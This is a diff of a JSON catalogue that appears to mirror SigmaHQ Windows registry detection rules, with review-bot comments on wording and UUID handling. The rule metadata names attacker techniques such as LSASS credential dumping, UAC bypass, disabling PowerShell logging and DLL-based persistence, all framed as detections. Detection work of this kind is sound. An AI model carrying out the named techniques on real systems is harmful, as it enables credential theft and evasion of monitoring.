+ "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "e3b50fa5-3c3f-444e-937b-0a99d33731cd",
 "value": "Outlook C2 Registry Key"
 },
 {
- "description": "Detects the modification of the registry of the currently logged in user to disable PowerShell module logging, script block logging or transcription and script execution logging",
+ "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging",
 "meta": {
 "author": "frack113",
 "creation_date": "2022/04/02",
@@ -14365,7 +17991,7 @@
 "Unknown"
 ],
 "filename": "registry_set_powershell_logging_disabled.yml",
- "level": "medium",
+ "level": "high",
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
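Review bot: The replacement description for the PowerShell logging rule now reads as a sentence fragment, `... for the currently logged-in user. In order to disable PowerShell module logging ...`, where the removed text was one complete sentence. Since this file mirrors the SigmaHQ rule, the wording fix belongs upstream, as a single sentence such as `Detects changes to the registry for the currently logged-in user in order to disable PowerShell module logging, script block logging or transcription and script execution logging`, and the next regeneration would carry it in. The entry starts inside this hunk and ends outside it.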
@@ -14377,8 +18003,17 @@ "attack.t1564.001" ] }, + "related": [ + { + "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "value": "PowerShell Logging Disabled" + "value": "PowerShell Logging Disabled Via Registry Key Tampering" }, { "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", @@ -14440,8 +18075,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", + "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml" ], "tags": [ 
@@ -14449,9 +18084,42 @@ "attack.t1137" ] }, + "related": [ + { + "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", "value": "IE Change Domain Zone" }, + { + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_persistence_natural_language.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/", + "https://persistence-info.github.io/Data/naturallanguage6.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", + "value": "Potential Persistence Via DLLPathOverride" + }, { "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", "meta": { @@ -14473,6 +18141,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", "value": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download" }, 
@@ -14489,8 +18166,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml" ], "tags": [ @@ -14500,6 +18177,15 @@ "car.2019-04-001" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "value": "UAC Bypass via Event Viewer - Registry Set" }, @@ -14518,8 +18204,8 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" ], "tags": [ 
@@ -14530,6 +18216,30 @@
 "uuid": "480421f9-417f-4d3b-9552-fd2728443ec8",
 "value": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification"
 },
+ {
+ "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/07/21",
+ "falsepositive": [
+ "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way"
+ ],
+ "filename": "registry_set_persistence_mpnotify.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://persistence-info.github.io/Data/mpnotify.html",
+ "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml"
+ ],
+ "tags": [
+ "attack.persistence"
+ ]
+ },
+ "uuid": "92772523-d9c1-4c93-9547-b0ca500baba3",
+ "value": "Potential Persistence Via Mpnotify"
+ },
 {
 "description": "Detects modification of autostart extensibility point (ASEP) in registry.",
 "meta": {
@@ -14545,8 +18255,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml"
 ],
 "tags": [
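Review bot: The description and `falsepositive` text of the new `Potential Persistence Via Mpnotify` entry talk about registering a `new SIP provider`, while the filename, title and both refs are about mpnotify; the identical text sits in the copy this commit removes at the old path on a later line, so it is inherited from the upstream rule and looks like a copy-paste from a SIP-related rule — worth confirming there rather than patching here. The UUID `92772523-d9c1-4c93-9547-b0ca500baba3` is kept across the remove/re-add, as is `41f6531d-af6e-4c6e-918f-b946f2b85a36` for the LSA Extensions entry, which is what keeps existing MISP references valid. A uniqueness check over `uuid` after each regeneration would guard against this move pattern ever leaving two copies of an entry behind.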
@@ -14578,6 +18288,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", "value": "Potential EventLog File Location Tampering" }, @@ -14644,8 +18363,8 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" ], "tags": [ @@ -14669,9 +18388,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://github.com/deepinstinct/Lsass-Shtinkering", "https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", - "https://github.com/deepinstinct/Lsass-Shtinkering", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml" ], "tags": [ @@ -14679,6 +18398,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", "value": "Lsass Full Dump Request Via DumpType Registry Settings" }, 
@@ -14695,9 +18423,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" ], "tags": [ @@ -14730,6 +18458,15 @@ "attack.t1564.002" ] }, + "related": [ + { + "dest-uuid": "8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "value": "Hide User Account Via Special Accounts Reg Key" }, @@ -14746,9 +18483,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" ], "tags": [ 
@@ -14757,9 +18494,43 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "46dd5308-4572-4d12-aa43-8938f0184d4f", "value": "Bypass UAC Using DelegateExecute" }, + { + "description": "Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_persistence_ie.yml", + "level": "low", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ie.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", + "value": "Modification of IE Registry Settings" + }, { "description": "Detects that a powershell code is written to the registry as a service.", "meta": { @@ -14781,6 +18552,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", "value": "PowerShell as a Service in Registry" }, 
@@ -14807,6 +18587,15 @@ "attack.t1574.012" ] }, + "related": [ + { + "dest-uuid": "ffeb0780-356e-4261-b036-cfb6bd234335", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ad89044a-8f49-4673-9a55-cbd88a1b374f", "value": "Enabling COR Profiler Environment Variables" }, @@ -14856,6 +18645,15 @@ "cve.2021.1675" ] }, + "related": [ + { + "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e0813366-0407-449a-9869-a2db1119dc41", "value": "Suspicious Printer Driver Empty Manufacturer" }, @@ -14881,6 +18679,15 @@ "attack.t1547.003" ] }, + "related": [ + { + "dest-uuid": "61afc315-860c-4364-825d-0d62b2e91edc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", "value": "Set TimeProviders DllName" }, @@ -14921,8 +18728,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", "https://twitter.com/dottor_morte/status/1544652325570191361", + "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml" ], "tags": [ 
@@ -14954,33 +18761,18 @@
 "attack.t1070.005"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "a750a9f6-0bde-4bb3-9aae-1e2786e9780c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e",
 "value": "Disable Administrative Share Creation at Startup"
 },
- {
- "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/07/21",
- "falsepositive": [
- "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way"
- ],
- "filename": "registry_set_mpnotify_persistence.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek",
- "https://persistence-info.github.io/Data/mpnotify.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mpnotify_persistence.yml"
- ],
- "tags": [
- "attack.persistence"
- ]
- },
- "uuid": "92772523-d9c1-4c93-9547-b0ca500baba3",
- "value": "Persistence Via Mpnotify"
- },
 {
 "description": "Detects disabling Windows Defender Exploit Guard Network Protection",
 "meta": {
@@ -15005,6 +18797,30 @@
 "uuid": "bf9e1387-b040-4393-9851-1598f8ecfae9",
 "value": "Disable Exploit Guard Network Protection on Windows Defender"
 },
+ {
+ "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/07/21",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "registry_set_persistence_lsa_extension.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/0gtweet/status/1476286368385019906",
+ "https://persistence-info.github.io/Data/lsaaextension.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml"
+ ],
+ "tags": [
+ "attack.persistence"
+ ]
+ },
+ "uuid": "41f6531d-af6e-4c6e-918f-b946f2b85a36",
+ "value": "Potential Persistence Via LSA Extensions"
+ },
 {
 "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification",
 "meta": {
@@ -15018,8 +18834,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd",
+ "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml"
 ],
 "tags": [
@@ -15027,6 +18843,15 @@ "attack.t1547.010" ] }, + "related": [ + { + "dest-uuid": "43881e51-ac74-445b-b4c6-f9f9e9bf23fe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "value": "Bypass UAC Using Event Viewer" }, @@ -15077,6 +18902,15 @@ "attack.t1559.002" ] }, + "related": [ + { + "dest-uuid": "232a7e42-cd6e-4902-8fe9-2960f529dd4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "63647769-326d-4dde-a419-b925cc0caf42", "value": "Enable Microsoft Dynamic Data Exchange" }, @@ -15104,6 +18938,15 @@ "attack.t1204.002" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "60936b49-fca0-4f32-993d-7415edcf9a5d", "value": "New Application in AppCompat" }, @@ -15120,8 +18963,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml" ], "tags": [ @@ -15145,8 +18988,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files", "https://twitter.com/pabraeken/status/998627081360695297", + "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files", "https://twitter.com/VakninHai/status/1517027824984547329", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml" ], 
@@ -15155,6 +18998,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", "value": "ScreenSaver Registry Key Set" }, @@ -15171,8 +19023,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", "https://persistence-info.github.io/Data/autodialdll.html", + "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml" ], "tags": [ @@ -15180,7 +19032,7 @@ ] }, "uuid": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", - "value": "Persistence Via AutodialDLL" + "value": "Potential Persistence Via AutodialDLL" }, { "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", @@ -15246,10 +19098,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" ], "tags": [ 
@@ -15281,6 +19133,15 @@ "attack.t1564.001" ] }, + "related": [ + { + "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5a5152f1-463f-436b-b2f5-8eceb3964b42", "value": "Modification of Explorer Hidden Keys" }, @@ -15307,6 +19168,15 @@ "attack.t1137" ] }, + "related": [ + { + "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5df86130-4e95-4a54-90f7-26541b40aec2", "value": "Registry Modification to Hidden File Extension" }, @@ -15321,8 +19191,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml" ], "tags": [ @@ -15331,6 +19201,22 @@ "attack.t1059.007" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "42f0e038-767e-4b85-9d96-2c6335bad0b5", "value": "Adwind RAT / JRAT - Registry" }, 
@@ -15357,6 +19243,15 @@
 "attack.t1548.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "724ea201-6514-4f38-9739-e5973c34f49a",
 "value": "Bypass UAC Using SilentCleanup Task"
 },
@@ -15373,9 +19268,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/",
 "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml"
 ],
 "tags": [
@@ -15423,9 +19318,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba",
 "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/",
 "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope",
+ "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml"
 ],
 "tags": [
@@ -15448,10 +19343,10 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html",
- "https://github.com/elastic/detection-rules/issues/1371",
- "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode",
 "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS",
+ "https://github.com/elastic/detection-rules/issues/1371",
+ "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html",
+ "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml"
 ],
 "tags": [
@@ -15460,33 +19355,18 @@
 "attack.t1112"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "04b45a8a-d11d-49e4-9acc-4a1b524407a5",
 "value": "DNS-over-HTTPS Enabled by Registry"
 },
- {
- "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/07/21",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "registry_set_chm_persistence.yml",
- "level": "high",
- "logsource.category": "registry_set",
- "logsource.product": "windows",
- "refs": [
- "https://persistence-info.github.io/Data/htmlhelpauthor.html",
- "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chm_persistence.yml"
- ],
- "tags": [
- "attack.persistence"
- ]
- },
- "uuid": "976dd1f2-a484-45ec-aa1d-0e87e882262b",
- "value": "CHM Helper DLL Persistence"
- },
 {
 "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification",
 "meta": {
@@ -15532,6 +19412,15 @@
 "attack.t1562"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "5b16df71-8615-4f7f-ac9b-6c43c0509e61",
 "value": "Hide Schedule Task Via Index Value Tamper"
 },
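Review bot: The `@@ -15460,33 +19355,18 @@` hunk drops the whole "CHM Helper DLL Persistence" cluster (uuid `976dd1f2-a484-45ec-aa1d-0e87e882262b`) and `@@ -15592,34 +19481,18 @@` does the same for "Registry Key Creation or Modification for Shim DataBase" (uuid `dfb5b4e8-91d0-4291-b40a-e3b0d3942c45`); nothing in the hunk says whether these UUIDs reappear elsewhere in the regenerated file. If the upstream rules were merely renamed or moved and the same UUID is emitted at another position, this is harmless; if they were retired upstream, removing the objects outright leaves any event or galaxy that already references those UUIDs pointing at nothing. For the retired case the safer pattern is to keep the object and mark it rather than delete it, so the reference stays resolvable. A one-line statement in the commit message of which rules were removed versus moved would make this reviewable without diffing the full 60k-line file.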
@@ -15548,9 +19437,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
- "https://twitter.com/MichalKoczwara/status/1553634816016498688",
 "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
+ "https://twitter.com/MichalKoczwara/status/1553634816016498688",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
